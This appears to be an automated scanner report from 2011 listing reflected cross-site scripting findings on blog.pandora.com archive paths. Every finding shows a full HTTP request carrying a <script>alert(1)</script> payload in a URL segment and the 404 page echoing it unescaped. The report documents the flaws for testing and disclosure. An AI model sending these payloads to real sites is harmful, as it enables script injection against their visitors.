GET /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3275c<script>alert(1)</script>7f101df09f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48254<script>alert(1)</script>063e227bb42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee644<script>alert(1)</script>e5f841d0237 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da5b9<script>alert(1)</script>ee09fe65134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload caeac<script>alert(1)</script>9cab335ec9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f8a9<script>alert(1)</script>cdadd2e3fba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a732<script>alert(1)</script>04358b3b570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb43c<script>alert(1)</script>796ed772059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad1ff<script>alert(1)</script>c05ada4297f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241d1<script>alert(1)</script>0051722519f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47148<script>alert(1)</script>a7a6b182afd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6439<script>alert(1)</script>47ec2e2aa5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0786<script>alert(1)</script>1fdd8212aca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e31a9<script>alert(1)</script>92fb96256a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55536<script>alert(1)</script>68fbf40c4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c021<script>alert(1)</script>00e0120b037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c9b0<script>alert(1)</script>b9522db024f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e75b<script>alert(1)</script>e4d44414054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc983<script>alert(1)</script>2400c298808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ was not found on this server.</p> ...[SNIP]...
